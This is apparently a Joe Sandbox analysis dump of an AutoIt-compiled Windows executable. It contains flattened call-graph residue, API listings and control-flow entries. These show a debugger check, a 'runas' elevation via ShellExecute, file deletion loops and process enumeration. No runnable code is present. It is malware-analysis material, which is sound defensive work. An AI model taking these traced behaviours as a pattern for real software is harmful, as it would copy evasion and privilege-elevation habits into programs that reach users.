98560->98561 98562->98539 98563->98540 98565 b418b4 __wsetenvp 98564->98565 98566 b41c7e 59 API calls 98565->98566 98567 b418c5 _memmove 98565->98567 98568 b7f4f1 _memmove 98566->98568 98567->98551 98570 b41692 98569->98570 98574 b416ba _memmove 98569->98574 98571 b50fe6 Mailbox 59 API calls 98570->98571 98570->98574 98573 b4176f _memmove 98571->98573 98572 b50fe6 Mailbox 59 API calls 98572->98573 98573->98572 98574->98558 98575->98559 98576->98496 98578 b94131 98577->98578 98579 b94965 
FindFirstFileW 98577->98579 98578->98172 98579->98578 98580 b9497a FindClose 98579->98580 98580->98578 98582 b34fa8 98581->98582 98583 b6dd2b 98581->98583 98587 b50fe6 Mailbox 59 API calls 98582->98587 98584 b6dd3c 98583->98584 98585 b41821 59 API calls 98583->98585 98632 b419e1 98584->98632 98585->98584 98588 b34fbb 98587->98588 98589 b6dd46 98588->98589 98591 b34fc6 98588->98591 98590 b34fd4 98589->98590 98592 b41207 59 API calls 98589->98592 98590->98255 98590->98258 98591->98590 98593 b41a36 59 API calls 98591->98593 98592->98590 98593->98590 98636 b4410a 98594->98636 98597 b4410a 2 API calls 98598 b4420b 98597->98598 98598->98272 98646 b44220 98599->98646 98603 b97c8a 98602->98603 98604 b50fe6 Mailbox 59 API calls 98603->98604 98605 b97c91 98604->98605 98606 b97c9d 98605->98606 98607 b97cbe 98605->98607 98609 b50fe6 Mailbox 59 API calls 98606->98609 98608 b50fe6 Mailbox 59 API calls 98607->98608 98610 b97ca6 _memset 98608->98610 98609->98610 98610->98285 98611->98259 98613 b442cf FindCloseChangeNotification 98612->98613 98614 b43e53 98613->98614 98653 b442f9 98614->98653 98616 b43e72 98620 b3d6d7 98616->98620 98661 b43c61 62 API calls Mailbox 98616->98661 98618 b43e84 98662 b4389f 98618->98662 98620->98257 98620->98258 98630 b43f0b FindCloseChangeNotification 98620->98630 98623->98281 98624->98286 98626 b442e8 98625->98626 98627 b3d766 98625->98627 98626->98627 98628 b442ed FindCloseChangeNotification 98626->98628 98627->98287 98629 b43f0b FindCloseChangeNotification 98627->98629 98628->98627 98629->98287 98630->98258 98631->98258 98633 b419fb 98632->98633 98635 b419ee 98632->98635 98634 b50fe6 Mailbox 59 API calls 98633->98634 98634->98635 98635->98589 98643 b44124 98636->98643 98637 b441ab SetFilePointerEx 98644 b442ae SetFilePointerEx 98637->98644 98640 b806cc 98645 b442ae SetFilePointerEx 98640->98645 98641 b4417f 98641->98597 98642 b806e6 98643->98637 98643->98640 98643->98641 98644->98641 98645->98642 98647 b44293 98646->98647 98651 b4422e 98646->98651 
98652 b442ae SetFilePointerEx 98647->98652 98648 b43eb2 98648->98279 98650 b44266 ReadFile 98650->98648 98650->98651 98651->98648 98651->98650 98652->98651 98654 b806fc 98653->98654 98655 b44312 CreateFileW 98653->98655 98656 b44334 98654->98656 98657 b80702 CreateFileW 98654->98657 98655->98656 98656->98616 98657->98656 98658 b80728 98657->98658 98659 b4410a 2 API calls 98658->98659 98660 b80733 98659->98660 98660->98656 98661->98618 98663 b438b5 98662->98663 98664 b438a8 98662->98664 98663->98620 98666 b9394d 98663->98666 98665 b4410a 2 API calls 98664->98665 98665->98663 98669 b9384c 98666->98669 98668 b93959 WriteFile 98668->98620 98670 b9385e 98669->98670 98671 b93853 98669->98671 98670->98668 98676 b442ae SetFilePointerEx 98671->98676 98673 b938b8 SetFilePointerEx 98677 b442ae SetFilePointerEx 98673->98677 98675 b938d7 98675->98668 98676->98673 98677->98675 98679 b41207 59 API calls 98678->98679 98680 b5012f 98679->98680 98681 b41207 59 API calls 98680->98681 98682 b50137 98681->98682 98683 b41207 59 API calls 98682->98683 98684 b5013f 98683->98684 98685 b41207 59 API calls 98684->98685 98686 b50147 98685->98686 98687 b8627d 98686->98687 98688 b5017b 98686->98688 98689 b41c9c 59 API calls 98687->98689 98690 b41462 59 API calls 98688->98690 98691 b86286 98689->98691 98692 b50189 98690->98692 98693 b419e1 59 API calls 98691->98693 98694 b41981 59 API calls 98692->98694 98697 b501be 98693->98697 98695 b50193 98694->98695 98695->98697 98698 b41462 59 API calls 98695->98698 98696 b501fe 98744 b41462 98696->98744 98697->98696 98700 b501dd 98697->98700 98710 b862a6 98697->98710 98701 b501b4 98698->98701 98757 b41609 98700->98757 98703 b41981 59 API calls 98701->98703 98702 b86376 98706 b41821 59 API calls 98702->98706 98703->98697 98705 b5020f 98708 b50221 98705->98708 98711 b41c9c 59 API calls 98705->98711 98719 b86333 98706->98719 98709 b50231 98708->98709 98712 b41c9c 59 API calls 98708->98712 98714 b50238 98709->98714 98716 b41c9c 59 API calls 98709->98716 
98710->98702 98713 b8635f 98710->98713 98726 b862dd 98710->98726 98711->98708 98712->98709 98713->98702 98721 b8634a 98713->98721 98717 b5023f Mailbox 98714->98717 98718 b41c9c 59 API calls 98714->98718 98715 b41462 59 API calls 98715->98696 98716->98714 98717->98313 98718->98717 98719->98696 98720 b41609 59 API calls 98719->98720 98760 b4153b 59 API calls 2 library calls 98719->98760 98720->98719 98724 b41821 59 API calls 98721->98724 98722 b8633b 98723 b41821 59 API calls 98722->98723 98723->98719 98724->98719 98726->98722 98727 b86326 98726->98727 98728 b41821 59 API calls 98727->98728 98728->98719 98730 b4133d 59 API calls 98729->98730 98731 b93f52 GetFileAttributesW 98730->98731 98732 b93f66 GetLastError 98731->98732 98734 b93f7f Mailbox 98731->98734 98733 b93f73 CreateDirectoryW 98732->98733 98735 b93f81 98732->98735 98733->98734 98733->98735 98734->98335 98735->98734 98736 b41981 59 API calls 98735->98736 98737 b93fc3 98736->98737 98738 b93f1d 59 API calls 98737->98738 98739 b93fcc 98738->98739 98739->98734 98740 b93fd0 CreateDirectoryW 98739->98740 98740->98734 98741->98299 98742->98332 98743->98332 98745 b41471 98744->98745 98746 b414ce 98744->98746 98745->98746 98748 b4147c 98745->98748 98747 b41981 59 API calls 98746->98747 98749 b4149f _memmove 98747->98749 98750 b41497 98748->98750 98751 b7f1de 98748->98751 98749->98705 98761 b41b7c 59 API calls Mailbox 98750->98761 98752 b41c7e 59 API calls 98751->98752 98754 b7f1e8 98752->98754 98755 b50fe6 Mailbox 59 API calls 98754->98755 98756 b7f208 98755->98756 98758 b41aa4 59 API calls 98757->98758 98759 b41614 98758->98759 98759->98696 98759->98715 98760->98719 98761->98749 98763 b34d37 84 API calls 98762->98763 98764 bad203 98763->98764 98769 bad24a Mailbox 98764->98769 98800 bade8e 98764->98800 98766 bad617 98851 badfb1 92 API calls Mailbox 98766->98851 98769->98338 98770 bad29b Mailbox 98770->98769 98773 b34d37 84 API calls 98770->98773 98787 bad4a2 98770->98787 98833 b9fc0d 59 API calls 2 library calls 
Execution Graph: rendered call-graph residue (a flattened node/edge dump of the sample's internal function graph) is not reproduced here. The only recoverable information is the set of Windows API and CRT functions named in the graph nodes, listed below as they appear in the dump:

Process, thread and debugging: GetCurrentProcess, TerminateProcess, GetCurrentThreadId, Process32NextW, GetExitCodeProcess, WaitForSingleObject, CloseHandle, Sleep, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, GetLastError, SetErrorMode, QueryPerformanceCounter, QueryPerformanceFrequency, timeGetTime
File system and environment: GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, FindCloseChangeNotification, MoveFileW, DeleteFileW, CopyFileExW, GetFullPathNameW, GetLongPathNameW, GetModuleFileNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, SHGetFolderPathW, GetOpenFileNameW, GetEnvironmentVariableW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetCommandLineW, GetStartupInfoW, GetStdHandle, GetFileType
Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
Modules and resources: LoadLibraryExW, FreeLibrary, CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
Window and message loop: GetMessageW, PeekMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, DestroyWindow, LockWindowUpdate, GetClassLongW, MessageBoxA, IsThemeActive, SystemParametersInfoW, VariantClear
String and locale: CompareStringW, GetStringTypeW, CharLowerBuffW, CharUpperBuffW, WideCharToMultiByte
Runtime and heap: GetProcessHeap, HeapAlloc, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EncodePointer, DecodePointer, and CRT internals (__cinit, __initterm_e, __wsetenvp, _wparse_cmdline, _free, _memmove, _memset, _wcscat, _wcscpy, _wcscmp, _strcat, __wcstoi64, _iswctype)
100325->100123 100328->100322 100331 b44ac4 100330->100331 100332 b80945 100330->100332 100544 b55802 100331->100544 100335 b996c4 100669 b9951a 100335->100669 100337 b996da 100337->100131 100339 b80908 100338->100339 100344 b44b44 100343->100344 100345 b44b80 LoadLibraryA 100343->100345 100344->100297 100344->100300 100345->100344 100346 b44b91 GetProcAddress 100345->100346 100346->100344 100350 b5549c __getstream 100347->100350 100348 b554af 100396 b58d58 58 API calls __getptd_noexit 100348->100396 100350->100348 100352 b554e0 100350->100352 100351 b554b4 100397 b58fe6 9 API calls _fseek 100351->100397 100366 b60718 100352->100366 100355 b554e5 100356 b554ee 100355->100356 100357 b554fb 100355->100357 100398 b58d58 58 API calls __getptd_noexit 100356->100398 100358 b55525 100357->100358 100359 b55505 100357->100359 100381 b60837 100358->100381 100399 b58d58 58 API calls __getptd_noexit 100359->100399 100365 b554bf @_EH4_CallFilterFunc@8 __getstream 100365->100303 100367 b60724 __getstream 100366->100367 100368 b59e3b __lock 58 API calls 100367->100368 100379 b60732 100368->100379 100369 b607a6 100401 b6082e 100369->100401 100370 b607ad 100406 b58a4d 58 API calls 2 library calls 100370->100406 100373 b60823 __getstream 100373->100355 100374 b607b4 100374->100369 100407 b5a05b InitializeCriticalSectionAndSpinCount 100374->100407 100377 b59ec3 __mtinitlocknum 58 API calls 100377->100379 100378 b607da EnterCriticalSection 100378->100369 100379->100369 100379->100370 100379->100377 100404 b56e7d 59 API calls __lock 100379->100404 100405 b56ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100379->100405 100389 b60857 __wopenfile 100381->100389 100382 b60871 100412 b58d58 58 API calls __getptd_noexit 100382->100412 100384 b60876 100413 b58fe6 9 API calls _fseek 100384->100413 100386 b60a8f 100409 b687d1 100386->100409 100387 b55530 100400 b55552 LeaveCriticalSection LeaveCriticalSection _fprintf 100387->100400 100389->100382 100395 b60a2c 100389->100395 100414 
b539fb 60 API calls 3 library calls 100389->100414 100391 b60a25 100391->100395 100415 b539fb 60 API calls 3 library calls 100391->100415 100393 b60a44 100393->100395 100416 b539fb 60 API calls 3 library calls 100393->100416 100395->100382 100395->100386 100396->100351 100397->100365 100398->100365 100399->100365 100400->100365 100408 b59fa5 LeaveCriticalSection 100401->100408 100403 b60835 100403->100373 100404->100379 100405->100379 100406->100374 100407->100378 100408->100403 100417 b67fb5 100409->100417 100411 b687ea 100411->100387 100412->100384 100413->100387 100414->100391 100415->100393 100416->100395 100418 b67fc1 __getstream 100417->100418 100419 b67fd7 100418->100419 100421 b6800d 100418->100421 100420 b58d58 __free_osfhnd 58 API calls 100419->100420 100422 b67fdc 100420->100422 100423 b6807e __wsopen_nolock 109 API calls 100421->100423 100424 b58fe6 _fseek 9 API calls 100422->100424 100425 b68029 100423->100425 100427 b67fe6 __getstream 100424->100427 100426 b68052 __wsopen_helper LeaveCriticalSection 100425->100426 100426->100427 100427->100411 100429 b44af7 100428->100429 100430 b44bb3 LoadLibraryA 100428->100430 100429->100307 100429->100308 100430->100429 100431 b44bc4 GetProcAddress 100430->100431 100431->100429 100433 b80923 100432->100433 100434 b44a9b 100432->100434 100439 b55a6d 100434->100439 100437->100319 100438->100322 100440 b55a79 __getstream 100439->100440 100441 b55a8b 100440->100441 100443 b55ab1 100440->100443 100547 b5581d 100544->100547 100546 b44ad5 100546->100335 100548 b55829 __getstream 100547->100548 100549 b5586c 100548->100549 100550 b5583f _memset 100548->100550 100551 b55864 __getstream 100548->100551 100552 b56e3e __lock_file 59 API calls 100549->100552 100574 b58d58 58 API calls __getptd_noexit 100550->100574 100551->100546 100554 b55872 100552->100554 100560 b5563d 100554->100560 100555 b55859 100575 b58fe6 9 API calls _fseek 100555->100575 100564 b55658 _memset 100560->100564 100566 b55673 100560->100566 100561 b55663 
100665 b58d58 58 API calls __getptd_noexit 100561->100665 100563 b55668 100666 b58fe6 9 API calls _fseek 100563->100666 100564->100561 100564->100566 100571 b556b3 100564->100571 100576 b558a6 LeaveCriticalSection LeaveCriticalSection _fprintf 100566->100576 100568 b557c4 _memset 100668 b58d58 58 API calls __getptd_noexit 100568->100668 100569 b54906 __fseek_nolock 58 API calls 100569->100571 100571->100566 100571->100568 100571->100569 100577 b6108b 100571->100577 100645 b60dd7 100571->100645 100667 b60ef8 58 API calls 4 library calls 100571->100667 100574->100555 100575->100551 100576->100551 100578 b610c3 100577->100578 100579 b610ac 100577->100579 100581 b617fb 100578->100581 100585 b610fd 100578->100585 100580 b58d24 __free_osfhnd 58 API calls 100579->100580 100582 b610b1 100580->100582 100583 b58d24 __free_osfhnd 58 API calls 100581->100583 100587 b61105 100585->100587 100594 b6111c 100585->100594 100646 b60df7 100645->100646 100647 b60de2 100645->100647 100651 b60e2c 100646->100651 100652 b66214 __getbuf 58 API calls 100646->100652 100659 b60df2 100646->100659 100648 b58d58 __free_osfhnd 58 API calls 100647->100648 100649 b60de7 100648->100649 100653 b54906 __fseek_nolock 58 API calls 100651->100653 100652->100651 100659->100571 100665->100563 100666->100566 100667->100571 100668->100563 100672 b5542a GetSystemTimeAsFileTime 100669->100672 100671 b99529 100671->100337 100673 b55458 __aulldiv 100672->100673 100673->100671 100850 b44d83 100851 b44dba 100850->100851 100852 b44e37 100851->100852 100853 b44dd8 100851->100853 100889 b44e35 100851->100889 100855 b44e3d 100852->100855 100856 b809c2 100852->100856 100857 b44de5 100853->100857 100858 b44ead PostQuitMessage 100853->100858 100854 b44e1a DefWindowProcW 100892 b44e28 100854->100892 100859 b44e65 SetTimer RegisterWindowMessageW 100855->100859 100860 b44e42 100855->100860 100905 b3c460 10 API calls Mailbox 100856->100905 100861 b44df0 100857->100861 100862 b80a35 100857->100862 100858->100892 100866 b44e8e 
CreatePopupMenu 100859->100866 100859->100892 100864 b80965 100860->100864 100865 b44e49 KillTimer 100860->100865 100867 b44eb7 100861->100867 100868 b44df8 100861->100868 100908 b92cce 97 API calls _memset 100862->100908 100872 b8096a 100864->100872 100873 b8099e MoveWindow 100864->100873 100874 b45ac3 Shell_NotifyIconW 100865->100874 100866->100892 100895 b45b29 100867->100895 100875 b80a1a 100868->100875 100876 b44e03 100868->100876 100870 b809e9 100906 b3c483 299 API calls Mailbox 100870->100906 100879 b8098d SetFocus 100872->100879 100880 b8096e 100872->100880 100873->100892 100881 b44e5c 100874->100881 100875->100854 100907 b88854 59 API calls Mailbox 100875->100907 100882 b44e9b 100876->100882 100883 b44e0e 100876->100883 100877 b80a47 100877->100854 100877->100892 100879->100892 100880->100883 100884 b80977 100880->100884 100902 b334e4 DeleteObject DestroyWindow Mailbox 100881->100902 100903 b45bd7 107 API calls _memset 100882->100903 100883->100854 100891 b45ac3 Shell_NotifyIconW 100883->100891 100904 b3c460 10 API calls Mailbox 100884->100904 100889->100854 100890 b44eab 100890->100892 100893 b80a0e 100891->100893 100894 b459d3 94 API calls 100893->100894 100894->100889 100896 b45b40 _memset 100895->100896 100897 b45bc2 100895->100897 100898 b456f8 87 API calls 100896->100898 100897->100892 100900 b45b67 100898->100900 100899 b45bab KillTimer SetTimer 100899->100897 100900->100899 100901 b80d6e Shell_NotifyIconW 100900->100901 100901->100899 100902->100892 100903->100890 100904->100892 100905->100870 100906->100883 100907->100889 100908->100877 100909 b3ac2a 100910 b3ac2f 100909->100910 100911 b41207 59 API calls 100910->100911 100912 b3ac39 100911->100912 100930 b50588 100912->100930 100916 b3ac6b 100917 b41207 59 API calls 100916->100917 100918 b3ac75 100917->100918 100958 b4fe2b 100918->100958 100920 b3acbc 100921 b3accc GetStdHandle 100920->100921 100922 b3ad18 100921->100922 100923 b72f39 100921->100923 100925 b3ad20 OleInitialize 100922->100925 
100923->100922 100924 b72f42 100923->100924 100965 b970f3 64 API calls Mailbox 100924->100965 100927 b72f49 100966 b977c2 CreateThread 100927->100966 100929 b72f55 CloseHandle 100929->100925 100931 b41207 59 API calls 100930->100931 100932 b50598 100931->100932 100933 b41207 59 API calls 100932->100933 100934 b505a0 100933->100934 100967 b410c3 100934->100967 100937 b410c3 59 API calls 100938 b505b0 100937->100938 100939 b41207 59 API calls 100938->100939 100940 b505bb 100939->100940 100941 b50fe6 Mailbox 59 API calls 100940->100941 100942 b3ac43 100941->100942 100943 b4ff4c 100942->100943 100944 b4ff5a 100943->100944 100945 b41207 59 API calls 100944->100945 100946 b4ff65 100945->100946 100947 b41207 59 API calls 100946->100947 100948 b4ff70 100947->100948 100949 b41207 59 API calls 100948->100949 100950 b4ff7b 100949->100950 100951 b41207 59 API calls 100950->100951 100952 b4ff86 100951->100952 100953 b410c3 59 API calls 100952->100953 100954 b4ff91 100953->100954 100955 b50fe6 Mailbox 59 API calls 100954->100955 100956 b4ff98 RegisterWindowMessageW 100955->100956 100956->100916 100959 b8620c 100958->100959 100960 b4fe3b 100958->100960 100970 b9a12a 59 API calls 100959->100970 100961 b50fe6 Mailbox 59 API calls 100960->100961 100963 b4fe43 100961->100963 100963->100920 100964 b86217 100965->100927 100966->100929 100968 b41207 59 API calls 100967->100968 100969 b410cb 100968->100969 100969->100937 100970->100964 100971 b39a88 100974 b386e0 100971->100974 100975 b386fd 100974->100975 100976 b70fad 100975->100976 100977 b70ff8 100975->100977 101001 b38724 100975->101001 100980 b70fb5 100976->100980 100983 b70fc2 100976->100983 100976->101001 101009 baaad0 299 API calls __cinit 100977->101009 100978 b35278 59 API calls 100978->101001 101007 bab0e4 299 API calls 100980->101007 100982 b52f70 __cinit 67 API calls 100982->101001 100998 b3898d 100983->100998 101008 bab58c 299 API calls 3 library calls 100983->101008 100986 b71289 100986->100986 100987 b33c30 68 API calls 
100987->101001 100988 b711af 101012 baae3b 89 API calls 100988->101012 100990 b33f42 68 API calls 100990->101001 100992 b38a17 100993 b339be 68 API calls 100993->101001 100998->100992 101013 b9a48d 89 API calls 4 library calls 100998->101013 100999 b353b0 299 API calls 100999->101001 101000 b41c9c 59 API calls 101000->101001 101001->100978 101001->100982 101001->100987 101001->100988 101001->100990 101001->100992 101001->100993 101001->100998 101001->100999 101001->101000 101003 b33938 68 API calls 101001->101003 101004 b3855e 299 API calls 101001->101004 101005 b384e2 89 API calls 101001->101005 101006 b3835f 299 API calls 101001->101006 101010 b3523c 59 API calls 101001->101010 101011 b873ab 59 API calls 101001->101011 101003->101001 101004->101001 101005->101001 101006->101001 101007->100983 101008->100998 101009->101001 101010->101001 101011->101001 101012->100998 101013->100986 101014 b39a6c 101017 b3829c 101014->101017 101016 b39a78 101018 b382b4 101017->101018 101019 b38308 101017->101019 101018->101019 101020 b353b0 299 API calls 101018->101020 101024 b38331 101019->101024 101027 b9a48d 89 API calls 4 library calls 101019->101027 101023 b382eb 101020->101023 101022 b70ed8 101022->101022 101023->101024 101026 b3523c 59 API calls 101023->101026 101024->101016 101026->101019 101027->101022

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B4526C
                                              • IsDebuggerPresent.KERNEL32 ref: 00B4527E
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B452E6
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                                • Part of subcall function 00B3BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B3BC07
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B45366
                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B80B2E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B80B66
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BE6D10), ref: 00B80BE9
                                              • ShellExecuteW.SHELL32(00000000), ref: 00B80BF0
                                                • Part of subcall function 00B4514C: GetSysColorBrush.USER32(0000000F), ref: 00B45156
                                                • Part of subcall function 00B4514C: LoadCursorW.USER32(00000000,00007F00), ref: 00B45165
                                                • Part of subcall function 00B4514C: LoadIconW.USER32(00000063), ref: 00B4517C
                                                • Part of subcall function 00B4514C: LoadIconW.USER32(000000A4), ref: 00B4518E
                                                • Part of subcall function 00B4514C: LoadIconW.USER32(000000A2), ref: 00B451A0
                                                • Part of subcall function 00B4514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B451C6
                                                • Part of subcall function 00B4514C: RegisterClassExW.USER32(?), ref: 00B4521C
                                                • Part of subcall function 00B450DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B45109
                                                • Part of subcall function 00B450DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B4512A
                                                • Part of subcall function 00B450DB: ShowWindow.USER32(00000000), ref: 00B4513E
                                                • Part of subcall function 00B450DB: ShowWindow.USER32(00000000), ref: 00B45147
                                                • Part of subcall function 00B459D3: _memset.LIBCMT ref: 00B459F9
                                                • Part of subcall function 00B459D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B45A9E
                                              Strings
                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B80B28
                                              • AutoIt, xrefs: 00B80B23
                                              • runas, xrefs: 00B80BE4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                              • API String ID: 529118366-2030392706
                                              • Opcode ID: 01870bc43fffb6a9da36daf65e1176885435f3794f15eed6064d0cbc02478338
                                              • Instruction ID: cf9f2ad45eb9a5a82703ef9a6fe4ebe95d85d1fc16e2289e84ac4538adc09e72
                                              • Opcode Fuzzy Hash: 01870bc43fffb6a9da36daf65e1176885435f3794f15eed6064d0cbc02478338
                                              • Instruction Fuzzy Hash: 17510231E4464CABCB21BBB49C46EFD7BF8EB0A380B1440E5F551631A2CEB05649EB20

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                                • Part of subcall function 00B94FEC: GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00B93D96
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B93E3E
                                              • MoveFileW.KERNEL32(?,?), ref: 00B93E51
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B93E6E
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B93E90
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B93EAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 676972a46237240de3999147363c85fb07f14268b6c78aae27adf9ff4c2f2e93
                                              • Instruction ID: fb9ed6a3516d06f3420eb709699f0b9ec2f3f99fe0ab95fe922b467e5ec7fb54
                                              • Opcode Fuzzy Hash: 676972a46237240de3999147363c85fb07f14268b6c78aae27adf9ff4c2f2e93
                                              • Instruction Fuzzy Hash: 6A514831C0114DAACF15EBA4DA929EEB7F9AF14301F2045E9E442B7192EB316F49DB60

                                              Control-flow Graph

                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00B45D40
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • GetCurrentProcess.KERNEL32(?,00BC0A18,00000000,00000000,?), ref: 00B45E07
                                              • IsWow64Process.KERNEL32(00000000), ref: 00B45E0E
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B45E54
                                              • FreeLibrary.KERNEL32(00000000), ref: 00B45E5F
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B45E90
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B45E9C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: b81ec185e74baf7d9a6e07a16eac685f5faaf3b5e0c6233f34ec5aeb5d588fbe
                                              • Instruction ID: 4111374c3eaf747a229cc145537531cc4db34e3e291537539ed179cd2b62e928
                                              • Opcode Fuzzy Hash: b81ec185e74baf7d9a6e07a16eac685f5faaf3b5e0c6233f34ec5aeb5d588fbe
                                              • Instruction Fuzzy Hash: 2391B53158AFC4DEC731DB6884505AAFFE5EF39300B8849DED0C797A12D630A648D769

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                                • Part of subcall function 00B94FEC: GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00B9407C
                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00B940CC
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B940DD
                                              • FindClose.KERNEL32(00000000), ref: 00B940F4
                                              • FindClose.KERNEL32(00000000), ref: 00B940FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: bfe935608a693ab3b6d05e3ebcad69d5caa5513c0648190c23f28edc41040b46
                                              • Instruction ID: 5b01da2fefef4e48cb4376530d6680af1e57debe7cdb1583877d221a7226b82d
                                              • Opcode Fuzzy Hash: bfe935608a693ab3b6d05e3ebcad69d5caa5513c0648190c23f28edc41040b46
                                              • Instruction Fuzzy Hash: 70319E31418385ABC600EF64C891DAFBBE8BE95304F444EADF5E183192DB219A4AD762
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00B9416D
